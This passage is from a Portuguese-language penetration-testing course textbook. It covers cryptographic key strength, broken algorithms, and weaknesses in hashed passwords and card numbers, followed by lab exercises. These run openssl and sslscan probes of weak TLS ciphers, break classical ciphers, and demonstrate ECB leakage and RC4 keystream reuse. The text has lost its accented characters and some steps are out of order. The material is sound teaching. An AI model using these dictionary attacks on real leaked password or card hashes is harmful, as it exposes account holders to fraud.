que utilizado. Portanto, ao combinar diferentes algoritmos, importante selecion-los
dentre aqueles que apresentam a mesma fora. A partir desse requisito, natural questionar como se deve medir o nvel de segurana de um criptossistema qualquer. A maneira
mais direta leva em considerao o custo do melhor ataque conhecido; se para execut-lo,
so necessrias 2n operaes, dito que o algoritmo fornece n bits de segurana.
Diversos trabalhos da literatura fornecem recomendaes sobre os tamanhos de chave que
devem ser utilizados, de acordo com o nvel de segurana desejado. Dentre eles, os mais
importantes so os artigos e relatrios tcnicos de Lenstra e Verheul (1999), Smart (2010)
e Barker et al. (2007). Este ltimo mais genrico e trata, alm do tema desta seo, de
todos os aspectos de gerenciamento de chaves criptogrficas. A Tabela 16 abaixo apresenta
exemplos de algoritmos e comprimentos de chave para alguns nveis comuns de segurana.
Recomenda-se que ela seja utilizada como ponto de partida, para avaliar se uma dada
soluo est aderente s melhores prticas de seleo de algoritmos criptogrficos.
Para exemplificar, considere-se uma aplicao que proteja o transporte de chaves com
RSA-3072, que cifre as informaes dos bancos de dados com Triple-DES com duas chaves
(2-TDES) e que proteja a integridade de dados com SHA-512. O nvel de segurana de cada
algoritmo , respectivamente, 128, 80 e 256 bits. Portanto, a sute adotada de mecanismos
fornece apenas 80 bits de segurana, o que est na margem do poder computacional existente atualmente. Para elevar substancialmente a fora do conjunto, bastaria substituir o
2-TDES para o AES-128, que passaria a ser o elo mais fraco, juntamente com o RSA-3072.
A Figura 9.59 abaixo apresenta exemplos de algoritmos e comprimentos de chave para
alguns nveis comuns de segurana.

Algoritmos assimtricos
Nvel de
segurana
Cifras
simtricas
80
Funes de hash
criptogrficas
(tamanho do hash)
Fatorao de
inteiros
Logaritmo
discreto
Logaritmo
discreto
elptico
2-TDES
RSA-1024
DH-1024
ECDSA-160
RIPEMD-160
112
3-TDES
RSA-2048
DH-2048
ECDSA-224
SHA-224
128
AES-128
RSA-3072
DH-3072
ECDSA-256
SHA-256
192
AES-192
RSA-7680
DH-7680
ECDSA-384
SHA-384
256
AES-256
RSA-15360
DH-15360
ECDSA-512
SHA-512
Figura 9.59
Nvel de segurana
de diversos algoritmos criptogrficos, em funo
do tamanho da
chave (Barker et
al., 2007).
451
Ataque a algoritmos
Que algoritmo mais difcil de ser atacado: AES com chave de 128 bits ou RSA com chave
de 1024 bits?
Uso de algoritmos criptogrficos com fraquezas conhecidas

Quais seriam os motivos de uma pessoa utilizar um carro cujos freios estivessem quebrados? Ignorncia do fato ou total irresponsabilidade, mas, em qualquer dos casos, gera-se
uma situao de insegurana para ela e para outras pessoas.
Este cenrio uma analogia ao emprego de mecanismos criptogrficos com fraquezas
conhecidas, o que deve ser totalmente evitado para que a segurana da informao no
seja comprometida.
No obstante, ainda hoje, encontram-se diversas aplicaes que no respeitam essa premissa bsica e pem em risco as informaes que manipulam.
Exemplos de algoritmos que no devem ser mais utilizados atualmente incluem:
1 Data Encryption Standard (DES).
1 RSA com chaves menores que 1024 bits.

1 MD5.
1 SHA-1.
Data Encryption Standard (DES)

Em 1998, um grupo de pesquisadores da Electronic Frontier Foundation elaborou uma
mquina contendo 1536 chips de propsito especfico, para varrer todo o espao de chaves
de 56 bits do algoritmo. O custo para implementao foi de US$250.000,00 e o tempo
mdio original para quebra de uma mensagem protegida por DES era de 4,5 dias. A prova
de conceito consistiu na soluo de um desafio apresentado pelo criptlogo Matt Blaze, cujo
objetivo era ser resolvido nica e exclusivamente por fora bruta.
RSA com chaves menores que 1024 bits

O recorde atual de fatorao de mdulos RSA pertence a Kleinjung et al. (2010), que foi
capaz de solucionar o desafio de 768 bits da antiga lista dos laboratrios RSA. Esse resul-
tado serviu para corroborar as estimativas de avano computacional e espera-se que, nos
prximos anos, mdulos de 1024 bits, que oferecem apenas 80 bits de segurana, possam
tambm ser fatorados. Por esse motivo, chaves menores que 1024 bits no devem mais ser
empregadas e uma migrao para tamanhos maiores desejvel.
MD5
O algoritmo teve a propriedade de resistncia a colises quebrada em 2004 por um time
de pesquisadores chineses (Wang e Yu, 2005). Desde ento, foi possvel gerar colises para
arquivos postscript, PDF e executveis e, pior ainda, forjar um certificado vlido para uma
autoridade certificadora intermediria (Stevens, 2009). Este poderoso ataque permite emitir
certificados de chave pblica fraudulentos para pessoas e servidores, viabilizando ataques
de personificao perfeitos.
452
SHA-1
Embora o algoritmo ainda no tenha sido efetivamente quebrado, teve a segurana terica de
80 bits reduzida para apenas 69 bits (Wang, Yin e Yu, 2005). Pouco tempo depois, outro time,
liderado tambm por Wang, descreveu um ataque mais rpido, capaz de gerar uma coliso
em 263 passos (Wang, Yao e Yao, 2005). Por essas razes, recomendvel migrar para a famlia
SHA-2 ou outra funo de hash criptogrfica que no possua nenhuma fraqueza conhecida.
Proteo de senhas de usurios

Normalmente, para proteger senhas de usurios, os sistemas armazenam apenas os
hashes delas, confiando na propriedade de resistncia da pr-imagem da funo criptogrfica utilizada.

Relembrando o conceito, isso determina que, para essencialmente todos os valores hash Y,
deve ser computacionalmente infactvel encontrar um valor X, tal que h(X) = Y. No presente
contexto, isso significa que, se um atacante obtiver um arquivo de hashes, ele no deve ser
capaz de recuperar as senhas originais, para autenticar-se no sistema.
A segurana deste mecanismo, porm, depende de algumas premissas que nem sempre
so satisfeitas. A primeira fraqueza resulta da qualidade das senhas escolhidas pelos

usurios, que, comumente, empregam palavras da lngua ou informaes pessoais.
Neste cenrio, um atacante no precisa se preocupar em quebrar a funo de hash criptogrfica. Muito mais fcil montar um dicionrio de palavras conhecidas e variaes e
pr-computar os respectivos hashes.
Assim, a partir de um arquivo de hashes de senhas obtido de uma aplicao vulnervel,
basta consultar se o hash de cada entrada est presente no dicionrio construdo. Em caso
positivo, a palavra correspondente ao hash coincidente pode ser utilizada como senha.
A vantagem deste ataque que o dicionrio pode ser construdo uma nica vez e utilizado
indefinidas vezes.
Para impedir que isso acontea, comum o emprego de salts, que so bits aleatrios
adicionados ao final de cada senha, antes do clculo do hash.

Como uma pequena alterao em uma entrada faz com que o hash correspondente sofra
uma grande variao, um nico bit de salt inviabiliza que o dicionrio inclua apenas os
hashes das palavras selecionadas, calculados sem o bit adicional (vide Figura 9.60). Note-se
que, para cada bit de salt, o dicionrio deve dobrar de tamanho e, assim, quanto mais bits
santana
Figura 9.60
Uso de salt
em senhas.
97dc75...
+ bit 0
c432da...
+ bit 1
34df32...
santana
O segundo pecado na proteo de senhas uma variante do problema j exposto, a qual

no envolve a escolha de uma senha fraca por parte do usurio. Esta vulnerabilidade ocorre
quando um sistema utiliza hashes criptogrficos para proteo de senhas pertencentes a
um domnio de baixa cardinalidade, isto , o nmero de senhas possveis pequeno.
forem utilizados, melhor.
453
Um exemplo disso so senhas bancrias de quatro dgitos numricos, que totalizam apenas
10 mil possibilidades, e podem ser quebradas da seguinte maneira, se hashes forem utilizados para proteg-las:
1. O atacante obtm o arquivo contendo os pares (usurio, senha) e, pelo tamanho do hash,
seleciona algumas funes candidatas.
2. Para cada uma das funes candidatas, ele gera uma tabela contendo senha e valor hash,
para todas as dez mil senhas possveis.
3. O usurio malicioso cruza, ento, o arquivo de senhas com as diversas tabelas, por meio
do campo hash, e a correta ser aquela que possuir todos os valores.
Proteo de dados de cartes de pagamento

O requisito 3.4 do padro PCI DSS (PCI, 2009a) demanda que nmeros de cartes de
pagamento (PANs) sejam protegidos, durante o armazenamento, por meio de mtodos
PAN
seguros. Tcnicas aceitas incluem o truncamento do nmero, o uso de funes de hash
Primary Account
Number corresponde
ao nmero de 14 a 19
dgitos que identifica
cartes de crdito e de
dbito.
criptogrficas, substituio por tokens e emprego de cifras simtricas.

A partir da verso 2.0 do padro, passaram a incluir, acertadamente, a ressalva de que
proibido armazenar concomitantemente partes do nmero de carto em claro e os hashes
dos nmeros inteiros. De fato, quando isto no respeitado, ataques similares queles
contra senhas podem ser realizados. Mas ser que suficiente seguir esta recomendao,
em termos de segurana? Como veremos, no , e o padro continua falho, no aspecto de
proteo de dados armazenados (Kost, 2007).
Um nmero de carto de crdito ou dbito possui de 15 a 16 dgitos, considerando-se
as bandeiras Visa, Mastecard, American Express, JCB e Discover, que fazem parte do
conselho PCI. Os seis primeiros dgitos do nmero correspondem ao BIN, responsvel
pela identificao do banco, e o ltimo utilizado como dgito verificador. Considerando
que a quantidade de bancos em um nico pas no extensa e que a grande maioria
das compras realizada com cartes de residentes, o conjunto de BINs aplicveis
razoavelmente pequeno. Adicionando o fato de que o nmero de carto deve satisfazer
ao Algoritmo de Luhn, que restringe o dgito verificador para um nico valor por PAN,
o total de dgitos que devem ser descobertos para um BIN arbitrrio de no mximo
nove. Desse modo, um ataque bem-sucedido contra um nico BIN deve ser capaz de
pr-calcular 1 bilho de hashes, o que est ao alcance de computadores comuns.
Por exemplo, em um Intel Core 2 Duo de 2,4 GHz, o OpenSSL capaz de calcular, aproximadamente, 2 milhes de hashes de nmeros de carto por segundo, utilizando-se blocos de
16 bytes. A Figura 9.61 ilustra o tempo em horas necessrio para montar, com o procesTeste de Invaso de Aplicaes Web
sador mencionado, um dicionrio que mapeie hashes para nmeros de carto, dependendo
454
do nmero de dgitos conhecidos. Para o caso de um BIN fixo, a tarefa pode ser executada
em meros 8,4 minutos. No pior cenrio, quando os 6 primeiros e os 4 ltimos dgitos so
armazenados em claro juntamente com o hash do nmero inteiro de carto, quase nenhum
tempo necessrio para executar o ataque.
Algoritmo de Luhn
Algoritmo utilizado
para validar nmeros
de cartes de crdito
e de dbito, alm
de outros nmeros
de identificao. Foi
criado pelo cientista
da computao Hans
Peter Luhn, quando
trabalhava na IBM.
Contramedidas
Um armazenamento seguro de informaes requer a seleo adequada de criptossistemas,
o gerenciamento das chaves criptogrficas utilizadas e o zelo adequado com a manipulao

de chaves pelos programas (Howard et al., 2005; Meucci et al., 2008). Desse modo:
1 Classifique as informaes e cifre aquelas que necessitam que o requisito de sigilo

seja satisfeito.
1 Se no for necessrio, no armazene dados sensveis, aps serem processados,

evitando, assim, ter de proteg-los. Um exemplo disso um sistema de pagamento eletrnico, que necessita do nmero de carto, somente at a transao passar pelo processo de autorizao; aps isso, ele pode, geralmente, ser descartado (PCI, 2009a,b).
1 No crie seus prprios algoritmos e protocolos criptogrficos, pois, mesmo quando

escritos por criptlogos de primeira linha, eventualmente, eles apresentam vulnerabilidades (Knudsen, 2005; Pramstaller et al., 2005).
1 Nunca empregue cifras clssicas para proteger informaes sensveis e lembre-se

sempre de que BASE64 no um algoritmo criptogrfico.
1 No utilize algoritmos criptogrficos com fraquezas conhecidas, como DES, MD5 (Wang
e Yu, 2005) e SHA-1 (Wang, Yin e Yu, 2005). Embora este ltimo ainda no tenha sido
completamente quebrado, j teve a segurana terica reduzida consideravelmente.
1 Quando cifras de bloco forem utilizadas, empregue modos de operao adequados a

cada situao.
1 Use algoritmos criptogrficos para satisfazerem apenas os requisitos de segurana da

informao para os quais foram criados.
1 Quando uma soluo empregar diversos algoritmos criptogrficos, determine o nvel

mnimo desejado de segurana e adote somente criptossistemas que atendam ao
limiar escolhido.
1 Muito cuidado ao proteger informaes pertencentes a domnios de baixa cardinalidade, pois ataques de dicionrios podem ser facilitados, dependendo da soluo
1 No proteja nmeros de carto de crdito e dbito com funes de hash criptogrficas,

apesar de aceitas para esse propsito pelo PCI DSS (PCI, 2009a). Em vez disso, utilize
cifras simtricas e realize a gesto adequada das chaves criptogrficas empregadas.
1 Crie e utilize processos e procedimentos para gerenciamento de chaves

criptogrficas, para que estas sejam protegidas durante todo o ciclo de vida, que vai
da criao destruio (Menezes et al., 2001; PCI, 2009a,b).
1 Utilize bons geradores de nmeros pseudo-aleatrios para a criao de chaves. Portanto, nunca use para esse propsito funes como rand() da linguagem C.
adotada.
455
1 Considere empregar hardware seguro, para realizar as operaes criptogrficas e

armazenar as chaves relacionadas, quando os dados protegidos forem extremamente sensveis. Parta da mxima de que o software no pode proteger a si prprio
(Howard et al., 2005).
1 Se no for possvel proteger chaves por meio de hardware seguro, utilize protocolos
de partilha de segredos com vrios custodiantes.
1 Nunca embuta chaves criptogrficas e senhas no cdigo do programa, pois so

facilmente recuperveis. Dependendo de como estiverem, basta um comando para
realizar a tarefa.
1 Limpe a memria alocada para chaves criptogrficas antes de liber-la para o sistema
operacional.
1 Marque as pginas de memria, contendo chaves criptogrficas, como inelegveis
para swap.
456
Atividade 1 Vulnerabilidades no transporte de informaes
Esta atividade compreende os testes para deteco de vulnerabilidades no transporte de
informaes. Para inici-la, carregue as mquinas virtuais do aluno e do servidor (Fedora) e
execute os roteiros na primeira delas.
Teste de SSLv2
O teste mais rpido para verificar se um servidor aceita a verso 2.0 do protocolo SSL por
meio da ferramenta OpenSSL:
1.
Abra uma janela de terminal.
2. Digite o comando abaixo para testar o servidor exemplo.esr.rnp.br:
~$ openssl s_client ssl2 connect exemplo.esr.rnp.br:443

3. Se a sesso for estabelecida sem erro, o servidor suporta SSLv2.
4. Pressione Ctrl-C para encerrar a conexo com o servidor.
Teste das sutes criptogrficas suportadas pelo servidor SSL/TLS

Nesta parte sero exercitados trs mtodos diferentes para deteco das sutes criptogrficas suportadas por um servidor.
OpenSSL
A opo do OpenSSL que testa se uma determinada sute suportada -cipher:
1.
2. Digite o seguinte comando para verificar se o servidor exemplo.esr.rnp.br suporta a sute
NULL-SHA:
~$ openssl s_client -cipher NULL-SHA -connect exemplo.esr.rnp.br:443

3. Se a sesso for estabelecida sem erro, o servidor suporta a sute vulnervel.
4. Pressione Ctrl-C para encerrar a conexo com o servidor.
THCSSLCheck
Como o THCSSLCheck compilado para plataformas Windows, necessrio utilizar o aplicativo Wine para execut-lo em sistemas Linux:
6. Inicie o THCSSLCheck a partir do menu Aplicativos\Curso Ferramentas.
7.
Execute o comando:
C:\> thcsslcheck exemplo.esr.rnp.br 443
457
8. Role a janela e analise o relatrio gerado. Quais sutes fracas so suportadas?
SSL Scan
Um ponto interessante do SSL Scan que ele exibe, para cada verso de protocolo, as sutes
criptogrficas utilizadas por padro pelo servidor sendo testado:
11. Digite o seguinte comando, para avaliar o servidor exemplo.esr.rnp.br:
~$ sslscan exemplo.esr.rnp.br
12. Role a janela e analise o relatrio gerado. Quais as diferenas para a sada do THCSSLCheck?
Prova de conceito de trfego TLS em claro

Este exerccio ilustra que possvel fazer com que os protocolos SSL e TLS no cifrem os
dados que protegem. O roteiro abaixo consiste em um autoataque, mas isso no importante por se tratar de uma prova de conceito.
1.
Inicie o Wireshark, presente no menu Aplicativos\Curso Ferramentas. Para conseguir capturar os pacotes, a aplicao deve ser executada em modo privilegiado e, por isso, uma
senha ser solicitada. Digite esruser e clique em OK.
2. Clique no primeiro cone da barra de ferramentas, para listar as interfaces de rede dispo-
nveis para captura. Na caixa de dilogo que aparece, clique em Options da linha eth1.
No campo Capture filter, digite tcp port https e clique em Start para iniciar a captura
de pacotes.
4. Conecte-se ao servidor web exemplo.esr.rnp.br, com o OpenSSL:
~$ openssl s_client -connect exemplo.esr.rnp.br:443

5. Digite a requisio abaixo, finalizando-a com [Enter] duas vezes:
GET / HTTP/1.0

7.
Procure pela primeira linha contendo TLSv1 e Application Data e a selecione.
8. Na regio central da tela do Wireshark, selecione a linha Secure Socket Layer.

9. Examine o contedo na parte inferior e veja que ele est cifrado.
10. Inicie nova captura no Wireshark, clicando no terceiro boto da barra de ferramentas
(Start new live capture).

11. Clique em Continue without saving, na caixa de dilogo que aparece.
458
12. Na janela de terminal, digite:
~$ openssl s_client -cipher NULL-SHA -connect exemplo.esr.rnp.br:443

13. Repita os Passos 5 a 8 acima, mas, em vez da primeira, procure pela ltima linha, no
Passo 7. Veja que o contedo agora est em claro, apesar de encapsulado por TLS.
14. Encerre o Wireshark e o terminal.
Certificado invlido
O propsito desta atividade verificar uma das situaes em que o navegador impossibilitado de realizar a negociao SSL/TLS com o servidor, devido a um problema no certificado:
1.
2. Acesse https://exemplo.esr.rnp.br.
3. Uma mensagem de erro exibida, informando que no possvel estabelecer uma
conexo segura. Clique em Technical Details e verifique o motivo do problema.

Recursos sensveis protegidos por HTTPS e HTTP

Informaes sensveis fornecidas por meio de HTTPS nunca devem ser disponibilizadas
tambm por HTTP simples, pois o usurio pode ser induzido a acessar a verso desprotegida da pgina, que pode ser facilmente capturada em trnsito.
1.
2. Acesse https://w3s.esr.rnp.br e observe que a pgina protegida por HTTPS.

3. Tente, agora, acessar o mesmo endereo pelo protocolo HTTP e observe o que acontece.
Neste caso, o servidor est configurado para redirecionar o usurio para a pgina protegida, evitando que informaes sejam expostas a pessoas no autorizadas.
Atividade 2 Vulnerabilidades no armazenamento de informaes

O objetivo desta atividade capacitar o aluno em tcnicas bsicas de criptoanlise, para
que seja capaz de recuperar informaes sensveis, protegidas por cifras fracas ou por
criptossistemas utilizados incorretamente. Todos os exerccios desta atividade necessitam
da mquina virtual do aluno e de arquivos contidos na pasta /home/esruser/Arquivos do
Curso/sessao-09.
Conforme explicado, BASE64 simplesmente um esquema de codificao e, por isso, no

pode ser utilizado na proteo do sigilo de informaes. Siga o roteiro abaixo para entender
como fcil recuperar a mensagem original a partir de um texto codificado em BASE64.
1.
2. Visualize o contedo do arquivo arquivo.b64:
~$ cat arquivo.b64
Dados protegidos com BASE64
459
3. Decodifique o arquivo com o comando:
~$ base64 -d arquivo.b64
Observe que no necessrio fornecer qualquer segredo para recuperar a mensagem original.
4. Visualize o contedo do arquivo arquivo2.b64:
~$ cat arquivo2.b64
5. Decodifique o arquivo com o comando:
~$ base64 -d arquivo2.b64 > arquivo2.txt

6. Visualize o arquivo gerado:
~$ cat arquivo2.txt
O arquivo resultante no est legvel e, aparentemente, est protegido por uma cifra de
substituio simples, que ser criptoanalisada em atividade posterior.
7.
Encerre a janela de terminal.
ndice de coincidncia
O ndice de coincidncia uma ferramenta que auxilia o processo de criptoanlise, ao
indicar o tipo de cifra utilizada e o provvel idioma da mensagem original. A ltima parte,
porm, requer uma mensagem suficientemente longa, que seja vlida estatisticamente.
1.
2. Verifique o ndice de coincidncia do arquivo em claro ingles.txt:
~$ ioc ingles.txt
3. Calcule o ndice de coincidncia do arquivo ingles.enc, resultante do ciframento de
ingles.txt, por um algoritmo de substituio simples:
~$ ioc ingles.enc
4. Observe que os ndices do arquivo em claro e do cifrado so praticamente idnticos, o
que coerente com o fato de que cifras monoalfabticas apenas transferem as frequncias individuais dos smbolos para outros.
5. Verifique o ndice de coincidncia do arquivo em claro portugues2.txt:
~$ ioc portugues2.txt
6. Calcule o ndice de coincidncia do arquivo portugues2.poli.enc, resultante do cifraTeste de Invaso de Aplicaes Web
mento de portugues2.txt, por um algoritmo de substituio polialfabtica:
460
~$ ioc portugues2.poli.enc
Note que o ndice de coincidncia bem menor que o apresentado por textos em linguagem
natural, conforme esperado.
7.
Encerre a janela de terminal.
Quebra da cifra de Cesar

A cifra de Cesar, assim como a codificao em BASE64, uma transformao fixa, que no
utiliza uma chave. Por esse motivo, muito fcil quebr-la e recuperar o texto legvel.
1.
2. Visualize o contedo do arquivo cesar.enc:
~$ cat cesar.enc
3. Calcule o ndice de coincidncia do arquivo:
~$ ioc cesar.enc
Observe que o valor encontrado indica corretamente que o texto est protegido por uma
cifra monoalfabtica ou de transposio.
4. Aplique a transformao de deciframento da cifra de Cesar:
~$ rotix -f cesar.enc -o cesar.plain -r 3 -L

5. Visualize o contedo do arquivo cesar.plain e veja que texto legvel foi recuperado:
~$ cat cesar.plain
6. Suponha que o arquivo arquivo2.txt, gerado no exerccio sobre BASE64, esteja prote-
gido com Cesar. Tente decifr-lo por meio do comando:
~$ rotix -f arquivo2.txt -o arquivo2.plain -r 3 -L

7.
Visualize o contedo do arquivo arquivo2.plain e veja que texto legvel foi recuperado:
~$ cat arquivo2.plain
Quebra da cifra de deslocamento

O grande problema da cifra de deslocamento que o espao de chaves utilizado contm
apenas 26 elementos, que podem ser testados exaustivamente at que o texto original seja
encontrado. Tendo isso em mente, aplique a tcnica ao arquivo deslocamento.enc:
1.
2. Visualize o contedo de deslocamento.enc:
~$ cat deslocamento.enc
~$ ioc deslocamento.enc
Este um exemplo de que uma classe incorreta de cifra pode ser identificada, quando o
texto cifrado for muito pequeno.
4. Tente realizar o deciframento com a chave k = 1 e veja se texto em claro recuperado:
~$ rotix -f deslocamento.enc -r 1 -L
5. Repita o passo anterior, variando k de 2 a 25 (opo -r), at que texto legvel seja obtido.
3. Calcule o ndice de coincidncia e observe a classe provvel de cifra utilizada:
461
Quebra de ROT13
ROT13 outro exemplo de transformao fixa, baseada em uma especializao da cifra de
deslocamento, com chave k = 13. A recuperao de texto protegido por este mecanismo
trivial, conforme ilustrado pela presente atividade:
1.
2. Visualize o contedo do arquivo rot13.enc:
~$ cat rot13.enc
3. Calcule o ndice de coincidncia do arquivo:
~$ ioc rot13.enc
4. Aplique a transformao descrita pelo algoritmo ROT13:
~$ rotix -f rot13.enc
Quebra da cifra de substituio simples

Uma cifra de substituio simples pode ser quebrada, como visto, por meio da tcnica de
anlise de frequncias, introduzida por al-Kind. Aplique este mtodo para criptoanalisar o
arquivo portugues3.mono.enc, utilizando as ferramentas fornecidas pelo stio web The
Black Chamber, de Simon Singh:
1.
2. Acesse http://www.simonsingh.net/The_Black_Chamber/frequencypuzzle.htm.
4. Calcule o ndice de coincidncia para o arquivo portugues3.mono.enc:
~$ ioc portugues3.mono.enc
Observe que tanto a cifra quanto o idioma foram corretamente identificados.
5. Abra o arquivo portugues3.mono.enc:
~$ gedit portugues3.mono.enc &

6. Selecione todo o texto (Ctrl-A) e o copie para a rea de transferncia (Ctrl-C).
7.
Retorne ao Firefox e cole o texto cifrado no campo Ciphertext.
8. Clique no boto Frequency of Individual Letters.

9. Veja no histograma quais so, ordenadamente, as trs letras mais frequentes.
10. Substitua, em ordem, as trs letras mais comuns na lngua portuguesa por aquelas
encontradas no passo anterior. Para isso, preencha os campos correspondentes em

Plaintext Alphabet.
11. Procure no campo Plaintext agrupamentos de letras que possam ser identificadas como
palavras. Para cada uma que encontrar, veja que mapeamentos podem ser inferidos entre
letras do texto em claro e do texto cifrado e efetue a substituio em Plaintext Alphabet.
12. Repita o Passo 11 at que o texto inteiro seja recuperado.
13. Encerre o Firefox e janela de terminal.
462
Quebra da cifra de Vigenre

Nesta atividade, um texto cifrado com Vigenre ser criptoanalisado pelo mtodo de
Babbage, com o auxlio de ferramentas do stio web The Black Chamber, de Simon Singh:
1.
Inicie o Internet Explorer, na mquina real.
2. Acesse http://www.simonsingh.net/The_Black_Chamber/cracking_tool.html.
3. Limpe a caixa de texto da tela inicial.
5. Abra o arquivo portugues2.poli.enc:
~$ gedit portugues2.poli.enc &

6. Selecione todo o texto (Ctrl-A) e o copie para a rea de transferncia (Ctrl-C).
7.
Retorne ao Internet Explorer e cole o texto cifrado na caixa de texto.
8. Clique em Find Repeated Sequences.

9. Role a tela, observe a coluna que possui o maior nmero de linhas marcadas com X e
clique no cabealho correspondente.

10. V ao final da pgina e clique no boto L1, para analisar a cifra monoalfabtica definida
para a primeira posio de cada bloco.

11. Clicando nas setas para a direita ou para a esquerda, alinhe o histograma em vermelho
com o da Figura 9.62 e observe que o texto no campo lateral muda automaticamente
para refletir o novo mapeamento. Oriente-se pelos picos das letras A, E e O e pelo
vale formado pelas quatro ltimas letras.
12. Repita o processo para os botes L*.

13. Encerre o Internet Explorer, a janela de terminal e o gedit.
Uso de modo de operao inadequado

Vimos que o uso do modo ECB, para mensagens maiores que o tamanho do bloco da cifra
utilizada, revela informaes sobre o texto em claro. Como exemplo, a presente atividade
visa ilustrar esta vulnerabilidade no contexto de proteo de imagens:
1.
Inicie uma janela de terminal.
Figura 9.62
Frequncias das
letras em portugus.
463
2. Visualize com o gimp a imagem figura.bmp:
~$ gimp figura.bmp &

3. Retorne janela de terminal.
4. Cifre a imagem figura.bmp com o algoritmo AES-128 em modo ECB:
~$ openssl enc -aes-128-ecb -in figura.bmp -out figura.bmp.ecb8

-K 01234567890123456789012345678901 -iv 0
5. Cifre a imagem figura.bmp com o algoritmo AES-128 em modo CBC:
~$ openssl enc -aes-128-cbc -in figura.bmp -out figura.bmp.cbc8

-K 01234567890123456789012345678901 -iv 0
6. Liste os arquivos do diretrio e observe que o tamanho dos arquivos cifrados maior
que o original em alguns bytes:
~$ ls -l
Isso se deve ao processo de padding, que consiste em se preencher a mensagem para que o
tamanho dela fique mltiplo daquele definido pelo bloco da cifra utilizada.
7.
Compacte com o gzip o arquivo figura.bmp.ecb:
~$ gzip -c figura.bmp.ecb > figura.bmp.ecb.gz

8. Compacte com o gzip o arquivo figura.bmp.cbc:
~$ gzip -c figura.bmp.cbc > figura.bmp.cbc.gz

9. Liste os arquivos do diretrio novamente:
~$ ls -l
Note que, enquanto no houve compresso do arquivo cifrado em modo CBC, a contraparte em modo ECB teve o tamanho reduzido para apenas 3,7% do original. Isto
indica a presena de muita redundncia no arquivo, o que no se espera da sada de
uma cifra utilizada corretamente.
10. Tente abrir o arquivo cifrado em modo ECB com o gimp:
~$ gimp figura.bmp.ecb &
Uma mensagem de erro indicando formato de arquivo desconhecido exibida, pois o
464
ciframento transforma toda a informao, inclusive o cabealho da imagem. Clique em

OK para encerr-la.
11. Como o formato BMP descreve um mapa de bits, copiando o cabealho da imagem
original para os arquivos cifrados, possvel visualiz-los e observe as mudanas que

ocorreram em cada bit, no processo de ciframento:
~$ ./bmphc figura.bmp figura.bmp.ecb

~$ ./bmphc figura.bmp figura.bmp.cbc
12. Visualize o arquivo figura.bmp.ecb:
~$ gimp figura.bmp.ecb &

Observe que a imagem do arquivo original preservada, mas com cores diferentes.
13. Retorne janela de terminal.
14. Visualize o arquivo figura.bmp.cbc e note que a imagem no possui relao nenhuma
com a figura original:
~$ gimp figura.bmp.cbc &

15. Encerre o gimp e a janela de terminal.
Uso incorreto de algoritmo criptogrfico

O RC4 pertence classe de cifras de fluxo aditivas e binrias e, portanto, no deve nunca ser
usado para cifrar textos diferentes com a mesma chave. Este exerccio ilustrar um ataque
de texto em claro conhecido, que possvel quando essa restrio no satisfeita:
1.
2. Visualize os contedos dos arquivos 1.txt, 2.txt e 3.txt:
~$ cat 1.txt; echo

~$ cat 2.txt; echo
~$ cat 3.txt; echo
3. Cifre os arquivos 1.txt, 2.txt e 3.txt com o algoritmo RC4:
~$ openssl enc -rc4-40 -in 1.txt -out 1.enc -K 0123456789

4. Analise os textos cifrados resultantes, comparando-os com os respectivos textos em claro:
~$ hexdump 1.txt 1.enc

5. Considere que o atacante tenha acesso somente aos arquivos cifrados, mas que conhece
o texto em claro correspondente ao primeiro deles, isto , o contedo de 1.txt. Calculando o XOR byte a byte entre este arquivo e o 1.enc, obtm-se o fluxo de chaves gerado
por meio do comando abaixo, que grava o resultado no arquivo ks.bin:
~$ fxor 1.enc 1.txt ks.bin

6. Visualize o fluxo de chaves:
~$ hexdump ks.bin
pelo RC4, que no varia quando uma chave fixa empregada. Isso pode ser executado
465
7.
O conhecimento do fluxo de chaves gerado implica que irrelevante saber a chave especfica que foi utilizada no ciframento, pois, calculando o XOR byte a byte entre o primeiro
e qualquer texto protegido por ele, obtm-se o texto legvel correspondente:
~$ fxor 2.enc ks.bin 2.plain

~$ fxor 3.enc ks.bin 3.plain
8. Visualize os contedos dos arquivos 2.plain e 3.plain e veja que correspondem aos
textos em claro originais, presentes nos arquivos 2.txt e 3.txt, respectivamente:
~$ cat 2.plain; echo

~$ cat 3.plain; echo
Nvel de segurana dos algoritmos criptogrficos

Indique o nvel de segurana em bits das combinaes de algoritmos abaixo enumeradas:
1.
2-TDES, RSA-3072, RIPEMD-160.
2. AES-128, RSA-1024, SHA-512.

3. AES-192, RSA-2048, SHA-256.
4. AES-256, ECDSA-512, SHA-512.
Proteo inadequada de dados de domnio de pequena cardinalidade

O propsito desta atividade constatar a velocidade com que possvel gerar um dicionrio
de hashes para senhas numricas pequenas:
1.
2. Digite o comando abaixo para gerar um dicionrio para nmeros de seis dgitos:
~$ dictbuilder 6 list.txt
3. Abra o dicionrio gerado com o gedit:
~$ gedit list.txt
4. Veja o tamanho em MBytes do arquivo gerado:
~$ du -m list.txt
5. Encerre a janela de terminal e o gedit.
466
Bibliografia 9
1 BARKER, Elaine, BARKER, William, BURR, William, POLK, William e SMID, Miles.
Recommendation for Key Management Part I: General. NIST Special Publication SP800-57,
National Institute of Standards and Technology, 2007.
1 CARMICHAEL, Mary. Como Conter o Parasita Mais Letal do Mundo. Em Scientific American
Brasil, Ano 8, nmero 103, dezembro de 2010.
1 DWORKIN, Morris. Recommendation for Block Cipher Modes of Operation Methods and
Techniques. NIST Special Publication SP800-38A, National Institute of Standards and
Technology, 2001.
1 FRIEDMAN, William F. The index of coincidence and its applications in cryptology.

Department of Ciphers. Publ 22. Geneva, Illinois, EUA. Riverbank Laboratories, 1922.
1 GAINES, Helen Fouch. Cryptanalysis A study of ciphers and their solution. Dover
Publications, 1939.
1 Kleinjung, Thorsten, Aoki, Kazumaro, Franke, Jens, Lenstra, Arjen K., Thom, Emmanuel,
Bos, Joppe W., Gaudrym, Pierrick, Kruppa, Alexander, Montgomery, Peter L., Osvik, Dag
Arne, Riele, Herman te, Timofeev, Andrey e Zimmermann, Paul. Factorization of a 768-bit
RSA modulus. Cryptology ePrint Arhive 2010/006. IACR, 2010.
1 KNUDSEN, Lars. SMASH A Cryptographic Hash Function. Em Fast Software Encryption:

12th International Workshop, FSE 2005, volume 3557 de Lecture Notes in Computer
Science, pginas 228242. Springer, 2005.
1 KOST, Stephen. Security Analysis Hashing Credit Card Numbers: Unsafe Application Practice.
Relatrio Tcnico de Integrigy Corporation, 2007.
1 LENSTRA, Arjen, VERHEUL, Eric. Selecting Cryptographic Key Sizes. Journal of Cryptology,
volume 14, 1999.
1 MENEZES, Alfred, VAN OORSCHOT, Paul C. e VANSTONE, Scott A. Handbook of Applied

Cryptography. 5th edition. CRC Press, 2001.

